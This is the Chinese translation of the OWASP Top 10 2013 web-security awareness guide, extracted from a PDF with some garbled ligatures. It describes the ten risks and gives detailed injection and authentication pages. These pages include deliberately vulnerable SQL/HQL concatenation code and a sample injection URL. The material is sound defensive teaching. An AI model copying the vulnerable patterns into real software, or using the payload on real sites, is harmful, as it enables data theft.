I 简 介 欢 迎 欢 迎 阅 读 2013 年 版 的 OWASP Top 10! 该 版 本 在 2010 年 版 中 新 添 加 了 一 类 风 险, 以 涵 盖 更 普 遍 更 重 要 的 安 全 漏 洞 ; 并 基 于 最 新 的 流 行 程 度 数 据, 对 一 些 风 险 重 新 排

Transcription

1

2 O 关 于 OWASP 前 言 关 于 OWASP 不 安 全 的 软 件 已 经 在 破 坏 着 我 们 的 金 融 医 疗 国 防 能 源 和 其 他 重 要 网 络 架 构 随 着 我 们 的 数 字 化 架 构 变 得 越 来 越 复 杂 并 相 互 关 联, 实 现 应 用 程 序 安 全 的 难 度 也 呈 指 数 级 增 加 我 们 再 也 不 能 忽 视 像 OWASP Top 10 中 所 列 出 相 对 简 单 的 安 全 问 题 Top 10 项 目 的 目 标 是 通 过 找 出 企 业 组 织 所 面 临 的 最 严 重 的 风 险 来 提 高 人 们 对 应 用 程 序 安 全 的 关 注 度 Top 10 项 目 被 众 多 标 准 书 籍 工 具 和 相 关 组 织 引 用, 包 括 MITRE PCI DSS DISA FTC 等 等 此 版 本 的 OWASP Top 10 标 记 了 该 项 目 这 十 年 来 对 于 应 用 程 序 安 全 风 险 重 要 性 认 知 的 推 广 OWASP Top 10 最 初 于 2003 年 发 布, 并 于 2004 年 和 2007 年 相 继 做 了 少 许 的 修 改 更 新 2010 年 版 做 了 修 改 以 对 风 险 进 行 排 序, 而 不 仅 仅 对 于 流 行 程 度 本 次 发 布 的 2013 年 版 也 沿 用 了 该 方 法 我 们 鼓 励 各 位 通 过 使 用 此 Top 10 帮 助 您 的 企 业 组 织 了 解 应 用 程 序 安 全 开 发 人 员 可 以 从 其 他 企 业 组 织 的 错 误 中 学 习 到 经 验 而 执 行 人 员 需 要 开 始 思 考 如 何 管 理 软 件 应 用 程 序 在 企 业 内 部 产 生 的 风 险 从 长 远 来 看, 我 们 鼓 励 您 创 建 一 个 与 您 的 文 化 和 技 术 都 兼 容 的 应 用 安 全 计 划 这 些 计 划 可 以 是 任 意 形 式 和 大 小, 您 还 应 该 试 图 避 免 做 过 程 模 型 中 规 定 的 每 件 事 相 反, 利 用 您 组 织 的 现 有 优 势 并 衡 量 什 么 对 您 有 用 我 们 希 望 OWASP Top 10 能 有 助 于 您 的 应 用 程 序 安 全 如 果 有 任 何 疑 问 评 论 以 及 想 法, 请 不 要 犹 豫, 立 即 通 过 公 开 的 或 者 私 人 的 与 我 们 取 得 联 系 开 源 web 应 用 安 全 项 目 (OWASP) 是 一 个 开 放 的 社 区, 致 力 于 帮 助 各 企 业 组 织 开 发 购 买 和 维 护 可 信 任 的 应 用 程 序 在 OWASP, 您 可 以 找 到 以 下 免 费 和 开 源 的 信 息 : 应 用 安 全 工 具 和 标 准 关 于 应 用 安 全 测 试 安 全 代 码 开 发 和 安 全 代 码 审 查 方 面 的 全 面 书 籍 标 准 的 安 全 控 制 和 安 全 库 全 球 各 地 分 会 尖 端 研 究 专 业 的 全 球 会 议 邮 件 列 表 OWASP 中 国 更 多 信 息, 请 访 问 : 所 有 的 OWASP 工 具 文 档 论 坛 和 全 球 各 地 分 会 都 是 免 费 的, 并 对 所 有 致 力 于 改 进 应 用 程 序 安 全 的 人 士 开 放 我 们 主 张 将 应 用 程 序 安 全 问 题 看 作 是 人 过 程 和 技 术 的 问 题, 因 为 提 供 应 用 程 序 安 全 最 有 效 的 方 法 是 在 这 些 方 面 提 升 OWASP 是 一 个 新 型 组 织 没 有 商 业 压 力 使 得 我 们 能 够 提 供 无 偏 见 实 用 低 成 本 的 应 用 安 全 方 面 的 信 息 尽 管 OWASP 支 持 合 理 使 用 商 业 的 安 全 技 术, 但 是 OWASP 不 隶 属 于 任 何 技 术 公 司 和 许 多 开 源 软 件 项 目 一 样,OWASP 以 一 种 协 作 开 放 的 方 式 制 作 了 许 多 不 同 种 类 的 材 料 OWASP 基 金 会 是 确 保 项 目 长 期 成 功 的 非 营 利 性 组 织 几 乎 每 一 个 与 OWASP 相 关 的 人 都 是 一 名 志 愿 者, 这 包 括 了 OWASP 董 事 会 全 球 委 员 会 全 球 各 地 分 会 会 长 项 目 领 导 和 项 目 成 员 我 们 用 捐 款 和 基 础 设 备 来 支 持 创 新 的 安 全 研 究 我 们 期 待 您 的 加 入! 版 权 和 许 可 OWASP 基 金 会 版 权 所 有 OWASP 中 国 版 权 所 有 本 文 档 的 发 布 基 于 Creative Commons Attribution ShareAlike 3.0 license 任 何 重 复 使 用 或 发 行, 都 必 须 向 他 人 澄 清 该 文 档 的 许 可 条 款

3 I 简 介 欢 迎 欢 迎 阅 读 2013 年 版 的 OWASP Top 10! 该 版 本 在 2010 年 版 中 新 添 加 了 一 类 风 险, 以 涵 盖 更 普 遍 更 重 要 的 安 全 漏 洞 ; 并 基 于 最 新 的 流 行 程 度 数 据, 对 一 些 风 险 重 新 排 序 另 外, 该 版 本 通 过 创 建 一 类 特 定 风 险 而 引 入 了 组 件 安 全 风 险, 并 移 除 了 2010 年 版 中 的 A6 安 全 配 置 错 误 风 险 2013 年 版 的 OWASP Top 10 文 档 所 基 于 的 8 个 数 据 组 由 7 家 专 业 的 应 用 安 全 公 司 提 供, 其 中 包 括 :4 家 咨 询 公 司,3 家 产 品 OR SaaS 提 供 商 ( 其 中,1 家 提 供 静 态 工 具,1 家 提 供 动 态 工 具,1 家 两 者 都 提 供 ) 数 据 涵 盖 了 来 自 上 百 家 组 织 上 千 个 应 用, 超 过 500,000 个 漏 洞 Top 10 根 据 所 有 这 些 相 关 数 据 挑 选 和 排 序, 并 与 和 程 度 的 一 致 评 估 相 结 合 OWASP Top 10 的 首 要 目 的 是 培 训 开 发 人 员 设 计 人 员 架 构 师 经 理 和 企 业 组 织, 让 他 们 认 识 到 最 严 重 的 web 应 用 程 序 安 全 漏 洞 所 产 生 的 后 果 Top 10 提 供 了 防 止 这 些 高 风 险 问 题 的 基 本 方 法, 并 提 供 了 获 得 这 些 方 法 的 来 源 警 告 不 要 仅 关 注 OWASP Top 10: 正 如 在 OWASP 开 发 者 指 南 和 OWASP Cheat Sheet 中 所 讨 论 的, 能 整 个 web 应 用 程 序 安 全 的 漏 洞 成 百 上 千 这 些 指 南 是 当 今 web 应 用 程 序 开 发 人 员 的 必 读 资 料 而 OWASP 测 试 指 南 和 OWASP 代 码 审 查 指 南 则 指 导 人 们 如 何 有 效 地 查 找 web 应 用 程 序 中 的 漏 洞 这 两 本 指 南 在 发 布 OWASP Top 10 的 前 版 本 时 就 已 经 进 行 了 明 显 更 新 不 断 修 改 : 此 Top 10 将 不 断 更 新 即 使 您 不 改 变 应 用 程 序 的 任 何 一 行 代 码, 您 的 应 用 程 序 可 能 已 经 存 在 从 来 没 有 被 人 发 现 过 的 漏 洞 要 了 解 更 多 信 息, 请 查 看 Top 10 结 尾 的 建 议 部 分, 开 发 人 员 测 试 人 员 和 企 业 组 织 下 一 步 做 什 么 正 面 思 考 : 当 您 已 经 做 好 准 备 停 止 查 找 漏 洞 并 集 中 精 力 建 立 强 大 的 应 用 程 序 安 全 控 制 时,OWASP 已 经 制 作 了 应 用 程 序 安 全 验 证 标 准 (ASVS) 指 导 企 业 组 织 和 应 用 程 序 审 查 者 如 何 去 进 行 验 证 明 智 使 用 工 具 : 安 全 漏 洞 可 能 很 复 杂 并 且 藏 匿 在 代 码 行 的 深 处 查 找 并 消 除 这 些 漏 洞 的 最 根 本 有 效 的 方 法 就 是 利 用 专 家 的 经 验 以 及 好 的 工 具 其 他 : 在 您 的 组 织 中, 重 点 关 注 让 安 全 成 为 组 织 文 化 的 一 部 分 更 多 信 息, 请 参 见 开 放 软 件 保 证 成 熟 度 模 型 (SAMM) 和 Rugged Handbook 鸣 谢 感 谢 Aspect Security 自 2003 年 OWASP Top 10 项 目 成 立 以 来, 对 该 项 目 的 创 始 领 导 及 更 新, 同 时 我 们 也 感 谢 主 要 作 者 :Jeff Williams 和 Dave Wichers 我 们 也 要 感 谢 以 下 组 织 贡 献 了 它 们 的 漏 洞 数 据 用 于 支 持 该 项 目 2013 版 的 更 新 : Aspect Security StaPsPcs HP 来 自 ForPfy 和 WebInspect 的 StaPsPcs Minded Security StaPsPcs SoTtek StaPsPcs Trustware, SpiderLabs StaPsPcs Veracode StaPsPcs WhiteHat Security Inc. StaPsPcs 另 外, 我 们 还 要 感 谢 为 Top 10 前 版 本 做 出 共 享 的 人 员 如 果 没 有 他 们 的 贡 献,Top 10 不 可 能 成 为 现 在 这 样 我 们 还 要 感 谢 为 Top 10 本 版 本 做 出 显 著 内 容 贡 献 和 花 时 间 审 阅 的 专 家 们 : Adam Baso (Wikimedia FoundaPon) Mike Boberski (Booz Allen Hamilton) Torsten Gigler Neil Smithline MorphoTrust USA 提 供 了 Top 10 的 Wiki 版, 并 提 供 了 宝 贵 反 馈 意 见 最 后, 我 们 感 谢 所 有 的 翻 译 人 员 将 Top 10 翻 译 成 不 同 的 语 言, 帮 助 让 OWASP Top 10 对 全 世 界 的 人 们 都 可 以 更 容 易 获 得 OWASP TOP 10 中 文 项 目 组 组 长 : 王 颉 Rip 参 与 人 : 陈 亮 顾 庆 林 胡 晓 斌 李 建 蒙 王 文 君 杨 天 识 张 在 峰 ( 排 名 不 分 先 后, 姓 氏 拼 音 排 名 )

4 发 行 说 明 从 2010 版 到 2013 版 有 什 么 改 变? 应 用 程 序 安 全 的 威 胁 情 况 不 断 改 变 本 次 改 变 的 关 键 因 素 是 攻 击 者 制 造 的 最 新 进 展 新 技 术 发 布 带 来 的 新 缺 陷 和 大 量 部 署 的 综 合 系 统 为 跟 上 发 展, 我 们 周 期 性 的 更 新 OWASP Top 10 在 本 次 2013 年 版 本 中, 我 们 做 了 以 下 改 变 : 1) 失 效 的 身 份 认 证 和 会 话 管 理 风 险 的 排 名, 因 我 们 数 据 组 中 的 流 行 程 度 而 得 到 提 升 我 们 相 信 这 可 能 是 因 为 这 一 领 域 看 起 来 比 较 困 难, 而 不 是 因 为 这 些 因 素 真 的 越 来 越 流 行 这 导 致 了 A2 与 A3 风 险 的 位 置 互 换 2) 跨 站 请 求 伪 造 (CSRF) 风 险 从 2010-A5 下 降 至 2013-A8 我 们 相 信 这 是 因 为 CSRF 在 OWASP Top 10 中 已 经 存 在 了 6 年, 组 织 和 开 发 人 员 已 经 足 够 重 视 该 风 险, 从 而 使 CSRF 漏 洞 的 数 量 在 应 用 程 序 中 大 量 减 少 3) 我 们 从 2010 年 版 OWASP Top 10 中 扩 展 了 没 有 限 制 URL 访 问 风 险, 以 包 含 更 多 的 信 息 : A8 没 有 限 制 URL 访 问 风 险, 现 在 成 为 2013-A7 功 能 级 访 问 控 制 缺 失 风 险, 以 包 含 所 有 功 能 级 别 的 访 问 控 制 有 许 多 种 方 式 明 确 哪 种 功 能 被 访 问, 而 不 仅 是 URL 4) 我 们 合 并 并 扩 展 了 2010-A7 和 2010-A9, 形 成 了 2013-A6 敏 感 信 息 泄 漏 风 险 : - 该 新 风 险 是 由 2010-A7 不 安 全 的 加 密 存 储 风 险 和 2010-A9 传 输 层 保 护 不 足 风 险 合 并, 并 添 加 了 浏 览 器 端 的 敏 感 数 据 风 险 这 个 新 的 风 险 包 含 对 由 用 户 提 供 的 敏 感 数 据 的 敏 感 数 据 保 护 ( 而 不 是 2013 年 版 的 A4 和 A7 中 包 含 的 访 问 控 制 ), 在 应 用 程 序 中 发 送 并 存 储, 并 再 次 发 送 给 浏 览 器 5) 我 们 添 加 了 2013-A9 使 用 含 有 已 知 漏 洞 的 组 件 风 险 : + 该 风 险 在 2010-A6 安 全 配 置 错 误 风 险 中 有 所 提 及 但 现 在, 在 越 来 越 多 的 开 发 过 程 中 直 接 使 用 带 有 已 知 漏 洞 的 组 件 部 分, 它 因 此 成 为 了 一 类 单 独 的 风 险 OWASP Top ( 旧 版 ) A1 - 注 入 A3 - 失 效 的 身 份 认 证 和 会 话 管 理 A2 - 跨 站 脚 本 (XSS) A4 - 不 安 全 的 直 接 对 象 引 用 A6 - 安 全 配 置 错 误 A7 - 不 安 全 的 加 密 存 储 与 A9 合 并 成 为 è A8 - 没 有 限 制 URL 访 问 扩 展 成 为 è A5 - 跨 站 请 求 伪 造 (CSRF) OWASP Top ( 新 版 ) A1 - 注 入 A2 - 失 效 的 身 份 认 证 和 会 话 管 理 A3 - 跨 站 脚 本 (XSS) A4 - 不 安 全 的 直 接 对 象 引 用 A5 - 安 全 配 置 错 误 A6 - 敏 感 信 息 泄 漏 A7 - 功 能 级 访 问 控 制 缺 失 A8 - 跨 站 请 求 伪 造 (CSRF) < 合 并 在 A6 - 安 全 配 置 错 误 > A9 - 使 用 含 有 已 知 漏 洞 的 组 件 A10 - 未 验 证 的 重 定 向 和 转 发 A9 - 传 输 层 保 护 不 足 A10 - 未 验 证 的 重 定 向 和 转 发 与 2010 年 版 中 的 A7 合 并 成 为 2013 年 版 中 的 A6

5 风 险 应 用 程 序 安 全 风 险 什 么 是 应 用 程 序 安 全 风 险? 攻 击 者 可 以 通 过 应 用 程 序 中 许 多 不 同 的 路 径 方 法 去 危 害 您 的 或 者 企 业 组 织 每 种 路 径 方 法 都 代 表 了 一 种 风 险, 这 些 风 险 可 能 会, 也 有 可 能 不 会 严 重 到 值 得 您 去 关 注 攻 击 向 量 安 全 漏 洞 安 全 控 制 技 术 攻 击 漏 洞 控 制 攻 击 漏 洞 控 制 资 产 功 能 攻 击 漏 洞 资 产 漏 洞 控 制 有 时, 这 些 路 径 方 法 很 容 易 被 发 现 并 利 用, 但 有 的 则 非 常 困 难 同 样, 所 造 成 危 害 的 范 围 也 从 无 损 坏 到 有 可 能 完 全 损 害 您 的 整 个 为 了 确 定 您 的 企 业 的 风 险, 可 以 结 合 其 产 生 的 技 术 和 对 企 业 的, 去 评 估 攻 击 向 量 和 安 全 漏 洞 的 可 能 性 总 之, 这 些 因 素 决 定 了 全 部 的 风 险 我 有 什 么 风 险? OWASP Top 10 的 重 点 在 于 为 广 大 企 业 组 织 确 定 一 组 最 严 重 的 风 险 对 于 其 中 的 每 一 项 风 险, 我 们 将 使 用 基 于 OWASP 风 险 等 级 排 序 方 法 的 简 单 评 级 方 案, 提 供 关 于 可 能 性 和 技 术 方 面 的 普 遍 信 息 威 胁 代 理 应 用 描 述 攻 击 向 量 漏 洞 漏 洞 技 术 易 广 泛 易 严 重 平 均 常 见 平 均 中 等 难 少 见 难 小 应 用 / 描 述 参 考 资 料 OWASP 资 料 OWASP Risk RaPng Methodology ArPcle on Threat/Risk Modeling 其 他 资 料 FAIR InformaPon Risk Framework MicrosoT Threat Modeling (STRIDE and DREAD) 只 有 您 了 解 您 自 己 的 系 统 环 境 和 企 业 的 具 体 情 况 对 于 任 何 已 知 的 应 用 程 序, 可 能 某 种 无 法 实 施 相 应 的 攻 击, 或 者 技 术 并 没 有 什 么 差 别 因 此, 您 必 须 亲 自 评 估 每 一 种 风 险, 特 别 是 需 要 针 对 您 企 业 内 部 的 安 全 控 制 等 方 面 我 们 将 作 为 应 用 描 述, 作 为 应 用 / 描 述, 以 说 明 这 些 依 赖 于 您 企 业 中 应 用 的 详 细 信 息 Top 10 中 风 险 的 名 称, 有 的 来 自 于 攻 击 的 类 型, 有 的 来 自 于 漏 洞, 而 有 的 来 自 于 所 造 成 的 我 们 选 择 了 最 能 准 确 反 应 出 风 险 名 称, 并 在 可 能 的 情 况 下, 同 时 使 用 最 为 常 用 的 专 业 名 词 来 得 到 最 高 的 关 注 度

6 T10 OWASP TOP A1 注 入 注 入 攻 击 漏 洞, 例 如 SQL,OS 以 及 LDAP 注 入 这 些 攻 击 发 生 在 当 不 可 信 的 数 据 作 为 命 令 或 者 查 询 语 句 的 一 部 分, 被 发 送 给 解 释 器 的 时 候 攻 击 者 发 送 的 恶 意 数 据 可 以 欺 骗 解 释 器, 以 执 行 计 划 外 的 命 令 或 者 在 未 被 恰 当 授 权 时 访 问 数 据 A2 失 效 的 身 份 认 证 和 会 话 管 理 与 身 份 认 证 和 会 话 管 理 相 关 的 应 用 程 序 功 能 往 往 得 不 到 正 确 的 实 现, 这 就 导 致 了 攻 击 者 破 坏 密 码 密 匙 会 话 令 牌 或 攻 击 其 他 的 漏 洞 去 冒 充 其 他 用 户 的 身 份 A3 跨 站 脚 本 (XSS) 当 应 用 程 序 收 到 含 有 不 可 信 的 数 据, 在 没 有 进 行 适 当 的 验 证 和 转 义 的 情 况 下, 就 将 它 发 送 给 一 个 网 页 浏 览 器, 这 就 会 产 生 跨 站 脚 本 攻 击 ( 简 称 XSS) XSS 允 许 攻 击 者 在 受 害 者 的 浏 览 器 上 执 行 脚 本, 从 而 劫 持 用 户 会 话 危 害 网 站 或 者 将 用 户 转 向 至 恶 意 网 站 A4 不 安 全 的 直 接 对 象 引 用 当 开 发 人 员 暴 露 一 个 对 内 部 实 现 对 象 的 引 用 时, 例 如, 一 个 文 件 目 录 或 者 数 据 库 密 匙, 就 会 产 生 一 个 不 安 全 的 直 接 对 象 引 用 在 没 有 访 问 控 制 检 测 或 其 他 保 护 时, 攻 击 者 会 操 控 这 些 引 用 去 访 问 未 授 权 数 据 A5 安 全 配 置 错 误 好 的 安 全 需 要 对 应 用 程 序 框 架 应 用 程 序 服 务 器 web 服 务 器 数 据 库 服 务 器 和 平 台 定 义 和 执 行 安 全 配 置 由 于 许 多 设 置 的 默 认 值 并 不 是 安 全 的, 因 此, 必 须 定 义 实 施 和 维 护 这 些 设 置 这 包 含 了 对 所 有 的 软 件 保 持 及 时 地 更 新, 包 括 所 有 应 用 程 序 的 库 文 件 A6 敏 感 信 息 泄 漏 许 多 Web 应 用 程 序 没 有 正 确 保 护 敏 感 数 据, 如 信 用 卡, 税 务 ID 和 身 份 验 证 凭 据 攻 击 者 可 能 会 窃 取 或 篡 改 这 些 弱 保 护 的 数 据 以 进 行 信 用 卡 诈 骗 身 份 窃 取, 或 其 他 犯 罪 敏 感 数 据 值 需 额 外 的 保 护, 比 如 在 存 放 或 在 传 输 过 程 中 的 加 密, 以 及 在 与 浏 览 器 交 换 时 进 行 特 殊 的 预 防 措 施 A7 功 能 级 访 问 控 制 缺 失 大 多 数 Web 应 用 程 序 在 功 能 在 UI 中 可 见 以 前, 验 证 功 能 级 别 的 访 问 权 限 但 是, 应 用 程 序 需 要 在 每 个 功 能 被 访 问 时 在 服 务 器 端 执 行 相 同 的 访 问 控 制 检 查 如 果 请 求 没 有 被 验 证, 攻 击 者 能 够 伪 造 请 求 以 在 未 经 适 当 授 权 时 访 问 功 能 A8 跨 站 请 求 伪 造 (CSRF) 一 个 跨 站 请 求 伪 造 攻 击 迫 使 登 录 用 户 的 浏 览 器 将 伪 造 的 HTTP 请 求, 包 括 该 用 户 的 会 话 cookie 和 其 他 认 证 信 息, 发 送 到 一 个 存 在 漏 洞 的 web 应 用 程 序 这 就 允 许 了 攻 击 者 迫 使 用 户 浏 览 器 向 存 在 漏 洞 的 应 用 程 序 发 送 请 求, 而 这 些 请 求 会 被 应 用 程 序 认 为 是 用 户 的 合 法 请 求 A9 使 用 含 有 已 知 漏 洞 的 组 件 组 件, 比 如 : 库 文 件 框 架 和 其 它 软 件 模 块, 几 乎 总 是 以 全 部 的 权 限 运 行 如 果 一 个 带 有 漏 洞 的 组 件 被 利 用, 这 种 攻 击 可 以 造 成 更 为 严 重 的 数 据 丢 失 或 服 务 器 接 管 应 用 程 序 使 用 带 有 已 知 漏 洞 的 组 件 会 破 坏 应 用 程 序 防 御 系 统, 并 使 一 系 列 可 能 的 攻 击 和 成 为 可 能 A10 未 验 证 的 重 定 向 和 转 发 Web 应 用 程 序 经 常 将 用 户 重 定 向 和 转 发 到 其 他 网 页 和 网 站, 并 且 利 用 不 可 信 的 数 据 去 判 定 目 的 页 面 如 果 没 有 得 到 适 当 验 证, 攻 击 者 可 以 重 定 向 受 害 用 户 到 钓 鱼 软 件 或 恶 意 网 站, 或 者 使 用 转 发 去 访 问 未 授 权 的 页 面

7 A1 注 入 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 易 常 见 平 均 严 重 应 用 / 描 述 考 虑 任 何 能 够 向 系 统 发 送 不 信 任 数 据 的 人, 包 括 外 部 用 户, 内 部 用 户 和 管 理 员 攻 击 者 利 用 有 针 对 性 的 解 释 器 语 法 发 送 简 单 的 基 于 文 本 的 攻 击 几 乎 任 何 数 据 源 都 能 成 为 注 入 载 体, 包 括 内 部 来 源 注 入 漏 洞 发 生 在 应 用 程 序 将 不 可 信 的 数 注 入 能 导 致 数 据 丢 据 发 送 到 解 释 器 时 注 入 漏 洞 十 分 普 遍, 失 或 数 据 破 坏 缺 尤 其 是 在 遗 留 代 码 中 通 常 能 在 SQL 查 乏 可 审 计 性 或 是 拒 询 语 句 LDAP 查 询 语 句 Xpath 查 询 语 绝 服 务 注 入 漏 洞 句 OS 命 令 XML 解 析 器 SMTP 头 程 有 时 甚 至 能 导 致 完 序 参 数 等 中 找 到 注 入 漏 洞 很 容 易 通 过 全 主 机 接 管 审 查 代 码 发 现, 但 是 却 不 容 易 在 测 试 中 发 现 扫 描 器 和 模 糊 测 试 工 具 可 以 帮 助 攻 击 者 找 到 这 些 漏 洞 考 虑 受 的 数 据 和 运 行 解 释 器 的 平 台 的 商 业 价 值 所 有 的 数 据 都 有 可 能 被 偷 窃, 篡 改 和 删 除 您 的 声 誉 是 否 会 被? 我 是 否 存 在 注 入 漏 洞? 检 测 应 用 程 序 是 否 存 在 注 入 漏 洞 的 最 好 的 办 法 就 是 确 认 所 有 解 释 器 的 使 用 都 明 确 地 将 不 可 信 数 据 从 命 令 语 句 或 查 询 语 句 中 区 分 出 来 对 于 SQL 调 用, 这 就 意 味 着 在 所 有 准 备 语 句 (prepared statements) 和 存 储 过 程 (stored procedures) 中 使 用 绑 定 变 量 (bind variables), 并 避 免 使 用 动 态 查 询 语 句 检 查 应 用 程 序 是 否 安 全 使 用 解 释 器 的 最 快 最 有 效 的 方 法 是 代 码 审 查 代 码 分 析 工 具 能 帮 助 安 全 分 析 者 找 到 使 用 解 释 器 的 代 码 并 追 踪 应 用 的 数 据 流 渗 透 测 试 者 通 过 创 建 攻 击 的 方 法 来 确 认 这 些 漏 洞 可 以 执 行 应 用 程 序 的 自 动 动 态 扫 描 器 能 够 提 供 一 些 信 息, 帮 助 确 认 一 些 可 利 用 的 注 入 漏 洞 是 否 存 在 然 而, 扫 描 器 并 非 总 能 达 到 解 释 器, 所 以 不 容 易 检 测 到 一 个 攻 击 是 否 成 功 不 恰 当 的 错 误 处 理 使 得 注 入 漏 洞 更 容 易 被 发 现 攻 击 案 例 案 例 #1: 应 用 程 序 在 下 面 存 在 漏 洞 的 SQL 语 句 的 构 造 中 使 用 不 可 信 数 据 : String query = "SELECT * FROM accounts WHERE custid='" + request.getparameter("id") +"'"; 案 例 #2: 同 样 的, 框 架 应 用 的 盲 目 信 任, 仍 然 可 能 导 致 查 询 语 句 的 漏 洞 ( 例 如 :Hibernate 查 询 语 言 (HQL)): Query HQLQuery = session.createquery( FROM accounts WHERE custid=' + request.getparameter("id") + "'"); 在 这 两 个 案 例 中, 攻 击 者 在 浏 览 器 中 将 id 参 数 的 值 修 改 成 or 1 = 1 如 : h\p://example.com/app/accountview?id=' or '1'='1 这 样 查 询 语 句 的 意 义 就 变 成 了 从 accounts 表 中 返 回 所 有 的 记 录 更 危 险 的 攻 击 可 能 导 致 数 据 被 篡 改 甚 至 是 存 储 过 程 被 调 用 我 如 何 防 止 注 入 漏 洞? 防 止 注 入 漏 洞 需 要 将 不 可 信 数 据 从 命 令 及 查 询 中 区 分 开 1. 最 佳 选 择 是 使 用 安 全 的 API, 完 全 避 免 使 用 解 释 器 或 提 供 参 数 化 界 面 的 API 但 要 注 意 有 些 参 数 化 的 API, 比 如 存 储 过 程 (stored procedures), 如 果 使 用 不 当, 仍 然 可 以 引 入 注 入 漏 洞 2. 如 果 没 法 使 用 一 个 参 数 化 的 API, 那 么 你 应 该 使 用 解 释 器 具 体 的 escape 语 法 来 避 免 特 殊 字 符 OWASP 的 ESAPI 就 有 一 些 escape 例 程 3. 使 用 正 面 的 或 白 名 单 的 具 有 恰 当 的 规 范 化 的 输 入 验 证 方 法 同 样 会 有 助 于 防 止 注 入 攻 击 但 由 于 很 多 应 用 在 输 入 中 需 要 特 殊 字 符, 这 一 方 法 不 是 完 整 的 防 护 方 法 OWASP 的 ESAPI 中 包 含 一 个 白 名 单 输 入 验 证 例 程 的 扩 展 库 参 考 资 料 OWASP OWASP SQL InjecPon PrevenPon Cheat Sheet OWASP Query ParameterizaPon Cheat Sheet OWASP Command InjecPon ArPcle OWASP XML external EnPty (XXE) Reference ArPcle ASVS: Output Encoding/Escaping Requirements (V6) OWASP TesPng Guide: Chapter on SQL InjecPon TesPng 其 他 CWE Entry 77 on Command InjecPon CWE Entry 89 on SQL InjecPon CWE Entry 564 on Hibernate InjecPon

8 A2 失 效 的 身 份 认 证 和 会 话 管 理 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 任 何 匿 名 的 外 部 攻 击 者 和 拥 有 账 号 的 用 户 都 可 能 试 图 盗 取 其 他 用 户 账 号 同 样 也 会 有 内 部 人 员 为 了 掩 饰 他 们 的 行 为 而 这 么 做 平 均 攻 击 者 使 用 认 证 或 会 话 管 理 功 能 中 的 泄 露 或 漏 洞 ( 比 如 暴 露 的 帐 户 密 码 或 会 话 ID) 来 假 冒 用 户 广 泛 平 均 开 发 者 通 常 会 建 立 自 定 义 的 认 证 和 会 话 管 理 方 案 但 要 正 确 实 现 这 些 方 案 却 很 难, 结 果 这 些 自 定 义 的 方 案 往 往 在 如 下 严 重 这 些 漏 洞 可 能 导 致 部 分 甚 至 全 部 帐 户 遭 受 攻 击 一 旦 成 方 面 存 在 漏 洞 : 退 出 密 码 管 理 超 时 功, 攻 击 者 能 执 行 记 住 我 秘 密 问 题 帐 户 更 新 等 等 因 受 害 用 户 的 任 何 操 为 每 一 个 实 现 都 不 同, 要 找 出 这 些 漏 洞 作 因 此 特 权 帐 户 有 时 会 很 困 难 是 常 见 的 攻 击 对 象 应 用 / 描 述 需 要 考 虑 受 的 数 据 及 应 用 程 序 功 能 的 商 业 价 值 还 应 该 考 虑 漏 洞 公 开 后 对 的 不 利 我 存 在 会 话 劫 持 漏 洞 吗? 如 何 能 够 保 护 用 户 凭 证 和 会 话 ID 等 会 话 管 理 资 产 呢? 以 下 情 况 可 能 产 生 漏 洞 : 1. 用 户 身 份 验 证 凭 证 没 有 使 用 哈 希 或 加 密 保 护 详 见 A6 2. 认 证 凭 证 可 猜 测, 或 者 能 够 通 过 薄 弱 的 的 帐 户 管 理 功 能 ( 例 如 账 户 创 建 密 码 修 改 密 码 恢 复, 弱 会 话 ID) 重 写 3. 会 话 ID 暴 露 在 URL 里 ( 例 如, URL 重 写 ) 4. 会 话 ID 容 易 受 到 会 话 固 定 (session fixapon) 的 攻 击 5. 会 话 ID 没 有 超 时 限 制, 或 者 用 户 会 话 或 身 份 验 证 令 牌 特 别 是 单 点 登 录 令 牌 在 用 户 注 销 时 没 有 失 效 6. 成 功 注 册 后, 会 话 ID 没 有 轮 转 7. 密 码 会 话 ID 和 其 他 认 证 凭 据 使 用 未 加 密 连 接 传 输 详 见 A6 更 多 详 情 请 见 ASVS 要 求 部 分 V2 和 V3 攻 击 案 例 案 例 #1: 机 票 预 订 应 用 程 序 支 持 URL 重 写, 把 会 话 ID 放 在 URL 里 : h\p://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii 该 网 站 一 个 经 过 认 证 的 用 户 希 望 让 他 朋 友 知 道 这 个 机 票 打 折 信 息 他 将 上 面 链 接 通 过 邮 件 发 给 他 朋 友 们, 并 不 知 道 自 己 已 经 泄 漏 了 自 己 的 会 话 ID 当 他 的 朋 友 们 使 用 上 面 的 链 接 时, 他 们 将 会 使 用 他 的 会 话 和 信 用 卡 案 例 #2: 应 用 程 序 超 时 设 置 不 当 用 户 使 用 公 共 计 算 机 访 问 网 站 离 开 时, 该 用 户 没 有 点 击 退 出, 而 是 直 接 关 闭 浏 览 器 攻 击 者 在 一 个 小 时 后 能 使 用 相 同 浏 览 器 通 过 身 份 认 证 案 例 #3: 内 部 或 外 部 攻 击 者 进 入 系 统 的 密 码 数 据 库. 存 储 在 数 据 库 中 的 用 户 密 码 没 有 被 加 密, 所 有 用 户 的 密 码 都 被 攻 击 者 获 得 我 如 何 防 止? 对 企 业 最 主 要 的 建 议 是 让 开 发 人 员 使 用 如 下 资 源 : 1. 一 套 单 一 的 强 大 的 认 证 和 会 话 管 理 控 制 系 统 这 套 控 制 系 统 应 : 参 考 资 料 OWASP a) 满 足 OWASP 的 应 用 程 序 安 全 验 证 标 准 (ASVS) 中 V2( 认 证 ) 和 V3( 会 话 管 理 ) 中 制 定 的 所 有 认 证 和 会 话 管 理 的 要 求 b) 具 有 简 单 的 开 发 界 面 ESAPI 认 证 器 和 用 户 API 是 可 以 仿 照 使 用 或 扩 展 的 好 范 例 2. 企 业 同 样 也 要 做 出 巨 大 努 力 来 避 免 跨 站 漏 洞, 因 为 这 一 漏 洞 可 以 用 来 盗 窃 用 户 会 话 ID 详 见 A3 完 整 的 要 求 和 资 料, 见 ASVS requirements areas for AuthenPcaPon (V2) and Session Management (V3) OWASP AuthenPcaPon Cheat Sheet OWASP Forgot Password Cheat Sheet OWASP Session Management Cheat Sheet OWASP Development Guide: Chapter on AuthenPcaPon OWASP TesPng Guide: Chapter on AuthenPcaPon 其 他 CWE Entry 287 on Improper AuthenPcaPon CWE Entry 384 on Session FixaPon

